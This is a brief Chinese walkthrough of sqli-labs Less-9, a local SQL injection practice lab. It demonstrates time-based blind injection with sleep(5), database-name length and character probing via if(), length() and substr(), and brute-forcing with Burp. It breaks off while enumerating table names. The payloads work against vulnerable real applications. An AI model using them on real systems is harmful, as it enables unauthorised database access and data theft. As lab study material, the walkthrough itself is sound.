less-9:
http://127.0.0.1/sqli/Less-9/?id=1
1.判断为单引号的基于时间给的注入
http://127.0.0.1/sqli/Less-9/?id=1’ and sleep(5)–+
所以可以使用时间盲注来验证:
2.判断数据库名的长度为 8
http://127.0.0.1/sqli/Less-9/?id=1’ and if(length(database())>=9,sleep(5),1)–+
‘>=9的响应时间会比1至8的响应时间短,所以库长为8。’
3.使用 burp 来爆破数据库名 security
http://127.0.0.1/sqli/Less-9/?id=1’ and if(substr(database(),1,1)=‘a’,sleep(5),1)–+
4.使用 burp 来爆破表名(emails,)users
一个